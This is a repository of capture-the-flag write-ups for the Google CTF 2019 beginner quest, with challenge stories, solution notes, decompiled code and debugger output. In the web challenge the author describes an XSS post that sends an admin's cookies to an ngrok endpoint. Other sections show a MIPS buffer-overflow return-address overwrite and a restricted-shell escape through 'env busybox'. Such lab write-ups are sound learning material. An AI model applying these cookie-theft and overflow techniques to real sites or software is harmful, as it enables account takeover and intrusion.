├── 01-reversing-rand2
├── 01.zip
├── README.md
├── log.txt
└── rand2
├── 02-misc-satellite
├── README.md
├── README.pdf
├── ctf2.zip
└── init_sat
├── 03-reversing-family-computer
├── 03.zip
├── README.md
├── credentials.txt
├── extract-stream.ps1
├── file0.png
└── note.txt
├── 04-web-gov-xss
└── README.md
├── 05-pwn-buffer-overflow
├── 05.zip
├── README.md
├── bof
├── console.c
├── controlled-payload
├── flag
├── flag1
├── input-controlled.txt
├── input.txt
└── segfault-payload
├── 06-sandbox-readme
└── README.md
├── 07-reversing-emoji
├── .gitignore
├── 07.zip
├── README.md
├── __pycache__
│ ├── crawl.cpython-36.pyc
│ └── vm.cpython-36.pyc
├── ctf_crawl
│ ├── ctf_crawl
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ ├── __init__.cpython-36.pyc
│ │ │ └── settings.cpython-36.pyc
│ │ ├── items.py
│ │ ├── middlewares.py
│ │ ├── pipelines.py
│ │ ├── settings.py
│ │ └── spiders
│ │ │ ├── __init__.py
│ │ │ ├── __pycache__
│ │ │ ├── __init__.cpython-36.pyc
│ │ │ └── cat_images.cpython-36.pyc
│ │ │ └── cat_images.py
│ ├── images.zip
│ ├── output.json
│ └── scrapy.cfg
├── extract-palindroms.py
├── palindromes
├── palindromes.py
├── program
├── translated
├── vm.modified.py
└── vm.py
├── 08-misc-drive-to-target
├── README.md
└── drive.py
├── 09-web-cwo-xss
└── README.md
├── 10-crypto-caulingo
├── 10.zip
├── README.md
├── decode.py
├── msg.txt
└── project_dc.pdf
├── 11-hardware-gatelock
├── 11.zip
├── README.md
├── beginner
│ ├── auth.sqlite
│ ├── env_meta.txt
│ ├── force_loaded.txt
│ ├── ipban.txt
│ ├── map.sqlite
│ ├── map_meta.txt
│ ├── mesecon_actionqueue
│ ├── players.sqlite
│ ├── schems
│ │ └── challenge.mts
│ └── world.mt
└── challenge.tgz
├── 12-misc-promo
├── README.md
└── screenshot.png
├── README.md
└── assets
└── map.png
/01-reversing-rand2/01.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/01-reversing-rand2/01.zip
--------------------------------------------------------------------------------
/01-reversing-rand2/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Invitation
3 |
4 | You are a simple life form, exiled from your home planet and in search of a new place to call home. The ruling came fast. Your taste in music was deemed to be far too "out-there-man" for anyone to possibly associate with you anymore. You were given 60 revolutions of Xenon around Fir to leave and never return. Gather whatever possessions and leave. You find your parents music collection, oddly in it is a golden disc labelled "Property of NASA, if lost please return to: EVNJAKL 1600 Ampitheatre Parkway Mountain View California." The music on the disc was uncovered a while back and was not very interesting. This weird language that said something about "Peace, love and rock and roll. Also we're having a really cool party tonight, so for whoever is out there, bring a friend and come along! Co-ordinates enclosed." On the back the words "Draft, do not distribute or load onto probe" written in big red letters. That could mean anything.
5 |
6 | You'll go, since you have nowhere else to go. But you'll be careful. You well know to learn all you can about alien beings before making contact. They could be hostile, or listen to boring music. Time is slipping away fast, you race aboard the nearest ObarPool Spaceship. But you've never driven one... what next genius?
7 |
8 | ## Enter Space-Time Coordinates
9 | Label: misc
10 |
11 | Ok well done. The console is on. It's asking for coordinates. Beating heavily on the console yields little results, but the only time anything changes on your display is when you put in numbers.. So what numbers are you going to go for? You see the starship's logs, but is there a manual? Or should you just keep beating the console?
12 |
13 |
14 | # Solution
15 | The attachment is a zip file containing a `log.txt` file and a `rand2` program. Running `strings` on the binary shows the flag `CTF{welcome_to_googlectf}`
16 |
--------------------------------------------------------------------------------
/01-reversing-rand2/log.txt:
--------------------------------------------------------------------------------
1 | 0: AC+79 3888{6652492084280_198129318435598}
2 | 1: Pliamas Sos{276116074108949_243544040631356}
3 | 2: Ophiuchus{11230026071572_273089684340955}
4 | 3: Pax Memor -ne4456 Hi Pro{21455190336714_219250247519817}
5 | 4: Camion Gyrin{235962764372832_269519420054142}
6 |
--------------------------------------------------------------------------------
/01-reversing-rand2/rand2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/01-reversing-rand2/rand2
--------------------------------------------------------------------------------
/02-misc-satellite/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Arrival & Reconnaissance
3 |
4 | Having successfully figured out this "coordinate" problem. The ship lurches forward violently into space. This is one of the moments when you realize that some kind of thought or plan would have been good, but typically for you and how you found yourself in this situation, you didn't think too much before acting. Only the stars themselves know where you'll end up.
5 |
6 | After what seems like an eternity, or at least one full season of "Xenon's Next Top Galactic Overlord" you arrive in a system of 9 planetary bodies, though one of them is exceptionally small. You nostalgically remember playing explodatoid with your friends and hunting down planets like this. But this small planet registers a hive of noise and activity on your ships automated scanners. There's things there! Billions upon trillions of things, moving around, flying, swimming, sliding, falling.
7 |
8 | Of particular interest may be the insect-like creatures flying around this planet, uniformly. One has the words "Osmium Satellites" written on it. Maybe this is a starting point to get to know what's ahead of you.
9 |
10 | ## Satellite
11 | Label: networking
12 |
13 | Placing your ship in range of the Osmiums, you begin to receive signals. Hoping that you are not detected, because it's too late now, you figure that it may be worth finding out what these signals mean and what information might be "borrowed" from them. Can you hear me Captain Tim? Floating in your tin can there? Your tin can has a wire to ground control?
14 |
15 | Find something to do that isn't staring at the Blue Planet.
16 |
17 | # Solution
18 | Another attachment that is a zip file which contains a `README.pdf` and a `init_sat` binary. Opening the pdf shows some text and a picture containing the word `osmium`.
19 | Running the binary shows a prompt asking for a satellite name. Enter `osmium` and it presents 3 choices. Entering `a` will print some information including a link to a google doc `https://docs.google.com/document/d/14eYPluD_pi3824GAFanS29tWdTcKxP_XUxx7e303-3E`. The doc contains a single string `VXNlcm5hbWU6IHdpcmVzaGFyay1yb2NrcwpQYXNzd29yZDogc3RhcnQtc25pZmZpbmchCg==` which is base64 encoded which we can recognize by the characters and the `==` padding at the end. Decoding the string gives us
20 | ```
21 | Username: wireshark-rocks
22 | Password: start-sniffing!
23 | ```
24 |
25 | So now with wireshark open, as we enter `a` again and look at the traffic, we can see the flag in the text sent over the network `CTF{4efcc72090af28fd33a2118985541f92e793477f}`
--------------------------------------------------------------------------------
/02-misc-satellite/README.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/02-misc-satellite/README.pdf
--------------------------------------------------------------------------------
/02-misc-satellite/ctf2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/02-misc-satellite/ctf2.zip
--------------------------------------------------------------------------------
/02-misc-satellite/init_sat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/02-misc-satellite/init_sat
--------------------------------------------------------------------------------
/03-reversing-family-computer/03.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/03-reversing-family-computer/03.zip
--------------------------------------------------------------------------------
/03-reversing-family-computer/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Home Computer
3 | Label: forensics
4 |
5 | Blunderbussing your way through the decision making process, you figure that one is as good as the other and that further research into the importance of Work Life balance is of little interest to you. You're the decider after all. You confidently use the credentials to access the "Home Computer."
6 |
7 | Something called "desktop" presents itself, displaying a fascinating round and bumpy creature (much like yourself) labeled "cauliflower 4 work - GAN post." Your 40 hearts skip a beat. It looks somewhat like your neighbors on XiXaX3. ..Ah XiXaX3... You'd spend summers there at the beach, an awkward kid from ObarPool on a family vacation, yearning, but without nerve, to talk to those cool sophisticated locals.
8 |
9 | So are these "Cauliflowers" earthlings? Not at all the unrelatable bipeds you imagined them to be. Will they be at the party? Hopefully SarahH has left some other work data on her home computer for you to learn more.
10 |
11 | # Solution
12 | This attachment is a zip file containing a `family.ntfs` and `note.txt` file. Opening the `family.ntfs` file in something like 7zip shows the contents of a windows filesystem. Most of the files are empty, but we if navigate to `Users/Family/Documents` there is a file called `credentials.txt`. Opening the text file shows `I keep pictures of my credentials in extended attributes.`. Searching for ntfs extended attributes did not give much information but I knew there was something called `alternate data streams`, so maybe it meant those. Checking the data streams was easy with powershell
13 | ```ps
14 | Get-Item credentials.txt -stream *
15 | ```
16 | With that command, we can see that there is in fact another steam called `FILE0`. We can then extract the steam contents into a .png file which reveals the flag `CTF{congratsyoufoundmycreds}`
17 |
18 | The script `extract-stream.ps1` will extract the image from the file.
--------------------------------------------------------------------------------
/03-reversing-family-computer/credentials.txt:
--------------------------------------------------------------------------------
1 | I keep pictures of my credentials in extended attributes.
2 |
--------------------------------------------------------------------------------
/03-reversing-family-computer/extract-stream.ps1:
--------------------------------------------------------------------------------
1 | Get-Item credentials.txt -stream *
2 | $file = Get-Content credentials.txt -stream 'FILE0' -Encoding Byte -ReadCount 0
3 | Set-Content 'file0.png' -Encoding Byte -Value $file
4 |
--------------------------------------------------------------------------------
/03-reversing-family-computer/file0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/03-reversing-family-computer/file0.png
--------------------------------------------------------------------------------
/03-reversing-family-computer/note.txt:
--------------------------------------------------------------------------------
1 | If you're on MacOS, you can rename .ntfs to .dmg
2 |
--------------------------------------------------------------------------------
/04-web-gov-xss/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Government Agriculture Network
3 | Label: web
4 |
5 | Well it seems someone can't keep their work life and their home life separate. You vaguely recall on your home planet, posters put up everywhere that said "Loose Zips sink large commercial properties with a responsibility to the shareholders." You wonder if there is a similar concept here.
6 |
7 | Using the credentials to access this so-called Agricultural network, you realize that SarahH was just hired as a vendor or contract worker and given access that was equivalent. You can only assume that Vendor/Contractor is the highest possible rank bestowed upon only the most revered and well regarded individuals of the land and expect information and access to flow like the Xenovian acid streams you used to bathe in as a child.
8 |
9 | The portal picture displays that small very attractive individual whom you instantly form a bond with, despite not knowing. You must meet this entity! Converse and convince them you're meant to be! After a brief amount of time the picture shifts into a biped presumably ingesting this creature! HOW DARE THEY. You have to save them, you have to stop this from happening. Get more information about this Gubberment thing and stop this atrocity.
10 |
11 | You need to get in closer to save them - you beat on the window, but you need access to the cauliflower's host to rescue it.
12 |
13 | # Solution
14 | This one just links to a site `https://govagriculture.web.ctfcompetition.com`. The site just contains 2 images, and a input along with a submit button to create a post. There is also an admin link in the top nav bar. Clicking the admin link just lead to `https://govagriculture.web.ctfcompetition.com/admin` but redirected back to the main page. Clicking the submitted button did a POST to `https://govagriculture.web.ctfcompetition.com/post` with a response page that just said `Your post was submitted for review. Administator will take a look shortly. `. Nothing else happens afterwards. I was stuck on this for a while as I had no idea what to do since the submit or admin links did not appear to do anything. As the name of the task implies, an xss exploit is used somehow but I couldn't figure out how. After spending a lot of time clicking around, I saw a hint that creating a post would get a fake 'admin' on the server to view the post. Without that hint I would be wasting a lot more time.
15 |
16 | So now with that hint, I assumed that I would have to use xss to grab the cookies when the admin viewed the page and then send it back somehome. Unsure if my ISP even let me expose a webserver, I setup a tunnel using `ngrok`. All I did was run `ngrok http 80` and did not even need to setup a server since all I needed was a way to see the data. After setting that up, I entered this script as the post contents
17 | ```js
18 |
22 | ```
23 | The idea is that the cookies would be ecoded and sent to the endpoint through a request when the image tries to load.
24 |
25 | After hitting submit, I looked in the dashboard and saw that indeed a request had been made to the url along with the cookies as a query parameter. A quick decode and we have our flag `CTF{8aaa2f34b392b415601804c2f5f0f24e}`
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/05.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/05.zip
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## STOP GAN
3 | Label: pwn
4 |
5 | Success, you've gotten the picture of your lost love, not knowing that pictures and the things you take pictures of are generally two seperate things, you think you've rescue them and their brethren by downloading them all to your ships hard drive. They're still being eaten, but this is a fact that has escaped you entirely. Your thoughts swiftly shift to revenge. It's important now to stop this program from destroying these "Cauliflowers" as they're referred to, ever again.
6 |
7 | # Solution
8 | This attachment is a zip file containing a `bof` binary and a `console.c` source file. The description for the task also includes the text `buffer-overflow.ctfcompetition.com 1337`. Looking at the source file, we see that the binary `bof` is run using qemu and then we have to send input into that program and cause it to crash. There is also a bonus flag if we can cause a controlled crash. To test locally I just ran `qemu-mipsel bof` which runs the program and shows the prompt `Cauliflower systems never crash >>`. Entering text into the prompt just closes it. Since the goal was to use a buffer overflow I decided to just input a lot of text into the program and with a long enough input, a segfault is created. Now all we have to do is try in on the actual program. So we connect to the server provided in the task `nc buffer-overflow.ctfcompetition.com 1337`, enter `run` then enter our long string of input. After a successful crash, it prints out the flag `CTF{Why_does_cauliflower_threaten_us}`
9 |
10 | Since there is another flag, I decided to take a look at decompiling the `bof` binary. For this I used `ghidra`. Since I don't have much experience with this, it was quite difficult to figure out everything, but after playing around with it for a while this was what I figured out. This is what I figured out about what the program looks like
11 | ```c
12 | int main(void)
13 | {
14 | sighandler_t prevHandler;
15 | int returnVal;
16 | byte buffer[260];
17 |
18 | prevHandler = signal(SIGSEGV, segfault_handler);
19 | if (prevHandler == -1) {
20 | printf("An error occurred setting a signal handler.");
21 | returnVal = -1;
22 | } else {
23 | puts("Cauliflower systems never crash >>");
24 | scanf("%s", &buffer);
25 | returnVal = 0;
26 | }
27 | return returnVal;
28 | }
29 |
30 | void segfault_handler(void)
31 | {
32 | printf("segfault detected! ***CRASH***");
33 | print_file("flag");
34 | exit(0);
35 | }
36 |
37 | void print_file(char *filename)
38 | {
39 | int fileDescriptor;
40 | char buffer[4];
41 | int bytesRead;
42 |
43 | fileDescriptor = open(filename, O_RDONLY);
44 | if (fileDescriptor == -1) {
45 | puts("could not open flag");
46 | exit(1);
47 | }
48 | while ((bytesRead = read(fileDescriptor, &buffer, 1)) == 1) {
49 | write(STDOUT_FILENO, &buffer, 1);
50 | }
51 | close(fileDescriptor);
52 | return;
53 | }
54 | ```
55 |
56 | You can see that it does a `scanf` into a buffer of size 260. Therefore if we input something that is greater that `260 + 4 (frame pointer)` bytes, we should get a segfault because then we overwrite the return address. The `segfault-payload` file contains the data for causing a segfault.
57 |
58 | ```
59 | Stack
60 | +---------------------------+ High
61 | |Previous frame |
62 | | |
63 | +---------------------------+
64 | |Return address |
65 | +---------------------------+
66 | |Buffer |
67 | | |
68 | | |
69 | | |
70 | | |
71 | +---------------------------+
72 | |return value |
73 | +---------------------------+
74 | |signal_handler |
75 | +---------------------------+ Low
76 | ```
77 |
78 | Notice that there is no sign of the hidden flag in there. That was because ghidra removed an unreachable block. If we look at the assembly instead we can see the hidden block.
79 | ```mips
80 | 004009bc 60 1f 11 04 bal scanf ;call scanf()
81 | 004009c0 00 00 00 00 _nop ;branch delay slot
82 | 004009c4 10 00 dc 8f lw gp,0x10(s8) ;??
83 | 004009c8 18 00 c2 8f lw returnVal,0x18(s8) ;load word into returnVal
84 | 004009cc 07 00 40 14 bne returnVal,zero,setNormalReturnValue ;this jump skips over the get hidden flag section
85 | 004009d0 00 00 00 00 _nop
86 | getHiddenFlag
87 | 004009d4 30 80 82 8f lw returnVal,-0x7fd0(gp)
88 | 004009d8 40 08 42 24 addiu returnVal,returnVal,0x840
89 | 004009dc 25 c8 40 00 or t9,returnVal,zero
90 | 004009e0 97 ff 11 04 bal local_flag ;local_flag()
91 | 004009e4 00 00 00 00 _nop ;branch delay slot
92 | 004009e8 10 00 dc 8f lw gp,0x10(s8)
93 | setNormalReturnValue
94 | 004009ec 25 10 00 00 or returnVal,zero,zero
95 | exit
96 | 004009f0 25 e8 c0 03 or sp,s8,zero
97 | 004009f4 24 01 bf 8f lw ra,0x124(sp)
98 | 004009f8 20 01 be 8f lw s8,0x120(sp)
99 | 004009fc 28 01 bd 27 addiu sp,sp,0x128
100 | 00400a00 08 00 e0 03 jr ra
101 | 00400a04 00 00 00 00 _nop
102 | ```
103 |
104 | And this is the print local function
105 | ```c
106 | void local_flag(void)
107 | {
108 | print_file("flag1");
109 | exit(0);
110 | }
111 | ```
112 |
113 | To get a better picture of what is happening, I used qemu with the gdb debugger to step examine the stack frame.
114 | ```
115 | > qemu-mipsel-static -g 5555 bof
116 | > gdb-multiarch
117 | > (gdb) target remote localhost:5555
118 | ```
119 |
120 | We can then set a breakpoint after `scanf`
121 | > (gdb) b *0x004009c4
122 |
123 | Then print out information. Here was the information from the gdb session
124 | ```
125 | (gdb) i frame
126 | Stack level 0, frame at 0x7fffd8f0:
127 | pc = 0x4009c4 in main; saved pc = 0x400840
128 | Arglist at 0x7fffd8f0, args:
129 | Locals at 0x7fffd8f0, Previous frame's sp is 0x7fffd8f0
130 | Saved registers:
131 | gp at 0x7fffd7d8, s8 at 0x7fffd8e8, ra at 0x7fffd8ec, pc at 0x7fffd8ec
132 | (gdb) x/100xw $sp
133 | 0x7fffd7c8: 0x00000060 0x7fffd7e4 0x00000001 0x00000000
134 | 0x7fffd7d8: 0x004a8970 0x00000000 0x00000001 0xaaaaaaaa
135 | 0x7fffd7e8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
136 | 0x7fffd7f8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
137 | 0x7fffd808: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
138 | 0x7fffd818: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
139 | 0x7fffd828: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
140 | 0x7fffd838: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
141 | 0x7fffd848: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
142 | 0x7fffd858: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
143 | 0x7fffd868: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
144 | 0x7fffd878: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
145 | 0x7fffd888: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
146 | 0x7fffd898: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
147 | 0x7fffd8a8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
148 | 0x7fffd8b8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
149 | 0x7fffd8c8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
150 | 0x7fffd8d8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
151 | 0x7fffd8e8: 0xaaaaaaaa 0x00400840 <-- return address
152 | ```
153 |
154 | From here I tried overwriting the return address to point to the `read_local` function. Writing to the start of the function `0x00400840` successfuly jumped to the function but when it entered the `print_file` subroutine it crashed. Still not sure about why this happens. Instead, I skipped over some of the setup in the function and jumped to the address `0x00400860` which is where the stack is being setup for the call into `print_file`. This worked as the flag `CTF{controlled_crash_causes_conditional_correspondence}` was printed out.
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/bof:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/bof
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/console.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | /**
7 | * 6e: bufferflow triggering segfault - binary, compile with:
8 | * gcc /tmp/console.c -o /tmp/console -static -s
9 | *
10 | * Console allows the player to get info on the binary.
11 | * Crashing bof will trigger the 1st flag.
12 | * Controlling the buffer overflow in bof will trigger the 2nd flag.
13 | */
14 |
15 | int main() {
16 | setbuf(stdin, NULL);
17 | setbuf(stdout, NULL);
18 | setbuf(stderr, NULL);
19 | char inputs[256];
20 | printf("Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.\n Bonus flag for controlling the crash.\n");
21 | while(1) {
22 | printf("\nConsole commands: \nrun\nquit\n>>");
23 | if (fgets(inputs, 256, stdin) == NULL) {
24 | exit(0);
25 | }
26 | printf("Inputs: %s", inputs);
27 | if ( strncmp(inputs, "run\n\0", 256) == 0 ) {
28 | int result = system("/usr/bin/qemu-mipsel-static ./bof");
29 | continue;
30 | } else if ( strncmp(inputs, "quit\n\0", 256) == 0 ) {
31 | exit(0);
32 | } else {
33 | puts("Unable to determine action from your input");
34 | exit(0);
35 | }
36 | }
37 | return 0;
38 | }
39 |
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/controlled-payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/controlled-payload
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/flag:
--------------------------------------------------------------------------------
1 | {flag}
2 |
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/flag1:
--------------------------------------------------------------------------------
1 | {flag1}
2 |
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/input-controlled.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/input-controlled.txt
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/input.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/input.txt
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/segfault-payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/segfault-payload
--------------------------------------------------------------------------------
/06-sandbox-readme/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Work Computer
3 | Label: sandbox
4 |
5 | With the confidence of conviction and decision making skills that made you a contender for Xenon's Universal takeover council, now disbanded, you forge ahead to the work computer. This machine announces itself to you, surprisingly with a detailed description of all its hardware and peripherals. Your first thought is "Why does the display stand need to announce its price? And exactly how much does 999 dollars convert to in Xenonivian Bucklets?" You always were one for the trivialities of things.
6 |
7 | Also presented is an image of a fascinating round and bumpy creature, labeled "Cauliflower for cWo" - are "Cauliflowers" earthlings? Your 40 hearts skip a beat - these are not the strange unrelatable bipeds you imagined earthings to be.. this looks like your neighbors back home. Such curdley lobes. Will it be at the party?
8 |
9 | SarahH, who appears to be a programmer with several clients, has left open a terminal. Oops. Sorry clients! Aliens will be poking around attempting to access your networks.. looking for Cauliflower. That is, *if* they can learn to navigate such things.
10 |
11 | # Solution
12 | This task only provides the address `readme.ctfcompetition.com 1337`. When connected, we are presented with a shell. Typing `help` shows
13 | ```
14 | > help
15 | Alien's shell
16 | Type program names and arguments, and hit enter.
17 | The following are built in:
18 | cd
19 | help
20 | exit
21 | Use the man command for information on other programs.
22 | ```
23 | Trying something like `ls` shows us two items `ORME.flag` and `README.flag` seems like there might be two flags. Trying to execute files shows `permission denied`. Lets see what programs are available.
24 | > ls /bin
25 |
26 | ```
27 | arch
28 | busybox
29 | chgrp
30 | chown
31 | conspy
32 | date
33 | df
34 | dmesg
35 | dnsdomainname
36 | dumpkmap
37 | echo
38 | false
39 | df
40 | dmesg
41 | dnsdomainname
42 | dumpkmap
43 | echo
44 | false
45 | fdflush
46 | fsync
47 | getopt
48 | hostname
49 | ionice
50 | iostat
51 | ipcalc
52 | kill
53 | login
54 | ls
55 | lzop
56 | makemime
57 | mkdir
58 | mknod
59 | mktemp
60 | mount
61 | mountpoint
62 | mpstat
63 | netstat
64 | nice
65 | pidof
66 | ping
67 | ping6
68 | pipe_progress
69 | printenv
70 | ps
71 | pwd
72 | reformime
73 | rm
74 | rmdir
75 | run-parts
76 | setpriv
77 | setserial
78 | shell
79 | sleep
80 | stat
81 | stty
82 | sync
83 | tar
84 | true
85 | umount
86 | uname
87 | usleep
88 | watch
89 | ```
90 |
91 | I'm not too familiar with all the tools but one of them probably allows us to access to file. Going down the list, I saw `busybox` which seems promising. However running busybox shows the message `busybox can not be called for alien reasons.` So it seems that this may be our target.
92 |
93 | Running `ls -l`, the `README.flag` file is readable but tools like `cat` or `tail` did not exist. So I went down the list for a tool that could possibly read files. Something I learned was the `makemime` tool because after reading up on it, it appears to be able to read a file. Running
94 | > makemime README.flag
95 |
96 | Gives us:
97 | ```
98 | > makemime README.flag
99 | Mime-Version: 1.0
100 | Content-Type: multipart/mixed; boundary="245967688-281105878-1932398038"
101 |
102 | --245967688-281105878-1932398038
103 | Content-Type: application/octet-stream; charset=us-ascii
104 | Content-Disposition: inline; filename="README.flag"
105 | Content-Transfer-Encoding: base64
106 |
107 | Q1RGezRsbF9ENDc0XzVoNGxsX0IzX0ZyMzN9Cg==
108 | --245967688-281105878-1932398038--
109 | ```
110 |
111 | That string `Q1RGezRsbF9ENDc0XzVoNGxsX0IzX0ZyMzN9Cg==` looks like base64, and indeed decoding it gives us `CTF{4ll_D474_5h4ll_B3_Fr33}`. Now trying it for the other flag just left a blank screen so it was back to figuring out how to open busybox. At least that was the only thing I could think of. We also have to get permissions to access to file. I found a hint for this one which is the `env` command. The `env` command is able to execute a program and running `env busybox` worked. Now all I had to do was chmod and add read permissions
112 | ```
113 | > env busybox chmod +r ORME.flag
114 | > makemime ORME.flag
115 | Mime-Version: 1.0
116 | Content-Type: multipart/mixed; boundary="790050884-595716176-916811417"
117 |
118 | --790050884-595716176-916811417
119 | Content-Type: application/octet-stream; charset=us-ascii
120 | Content-Disposition: inline; filename="ORME.flag"
121 | Content-Transfer-Encoding: base64
122 |
123 | Q1RGe1RoM3IzXzFzXzRsdzR5NV80TjA3aDNyX1c0eX0K
124 | --790050884-595716176-916811417--
125 | ```
126 |
127 | Another base64 decode and we get the flag `CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}`
--------------------------------------------------------------------------------
/07-reversing-emoji/.gitignore:
--------------------------------------------------------------------------------
1 | primes*.txt
--------------------------------------------------------------------------------
/07-reversing-emoji/07.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/07.zip
--------------------------------------------------------------------------------
/07-reversing-emoji/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## FriendSpaceBookPlusAllAccessRedPremium.com
3 | Label: reversing
4 |
5 | Having snooped around like the expert spy you were never trained to be, you found something that takes your interest: "Cookie/www.FriendSpaceBookPlusAllAccessRedPremium.com" But unbeknownst to you, it was only the 700nm Wavelength herring rather than a delicious cookie that you could have found. It looks exactly like a credential for another system. You find yourself in search of a friendly book to read.
6 |
7 | Having already spent some time trying to find a way to gain more intelligence... and learn about those fluffy creatures, you (several)-momentarily divert your attention here. It's a place of all the individuals in the world sharing large amounts of data with one another. Strangely enough, all of the inhabitants seem to speak using this weird pictorial language. And there is hot disagreement over what the meaning of an eggplant is.
8 |
9 | But not much Cauliflower here. They must be very private creatures. SarahH has left open some proprietary tools, surely running this will take you to them. Decipher this language and move forth!
10 |
11 | # Solution
12 | The attachment is zip containing a `program` file and a `vm.py` file. Looking at the files, it appears that there is a stack based virtual machine implemented in `vm.py` which runs emoji based code located in `program`. If we just run the program `python3 vm.py program`, it begins to print out a url however it seems to stop after a bit. I initially thought that I would have to translate the program to figure out what it does and try to fix it however after waiting a bit, the program prints out more of the url. It seems that whatever the program is doing, takes longer and longer to calculate the result. After waiting long enough we can guess the url `http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com`.
13 |
14 | The website appears to be a collection of pictures of cats. Each page has a picture and a set of links and each link leads to another page and so on. Using `scrapy`, I crawled all the links and downloaded all the images. Going through them, it doesn't look like any of the pictures have the flag in it, either in the image itself or in the binary. So maybe the guess is incorrect and there is still more in the url.
15 |
16 | Taking a look at the program again, it seems like there are 3 phases of `🚛 🥇 1️⃣ 0️⃣ 1️⃣ 1️⃣ 4️⃣ 1️⃣ 0️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇` instructions. Looking at the operations map, these instructions are creating and pushing the values of the first register onto the stack. Note that each block also ends with `🚛 🥈 7️⃣ 6️⃣ 5️⃣ ✋` which loads a value into the second register. If we work backwords by searching for all the print instructions (🎤), we can see that they all have a `xor (🌓)` instruction before it. So the first assumption is it is xoring each of the numbers in the stack and printing them out. Adding these lines `print("{} ^ {}\n".format(b, a))` to the `xor` function in the vm prints out
17 |
18 | ```
19 | 106 ^ 2 h
20 | 119 ^ 3 t
21 | 113 ^ 5 t
22 | 119 ^ 7 p
23 | 49 ^ 11
24 | 74 ^ 101
25 | 172 ^ 131
26 | 242 ^ 151
27 | 216 ^ 181
28 | 208 ^ 191
29 | 339 ^ 313
30 | 264 ^ 353
31 | 344 ^ 373
32 | 267 ^ 383
33 | 743 ^ 727
34 | 660 ^ 757
35 | 893 ^ 787
36 | 892 ^ 797
37 | 1007 ^ 919
38 | 975 ^ 929
39 | ```
40 |
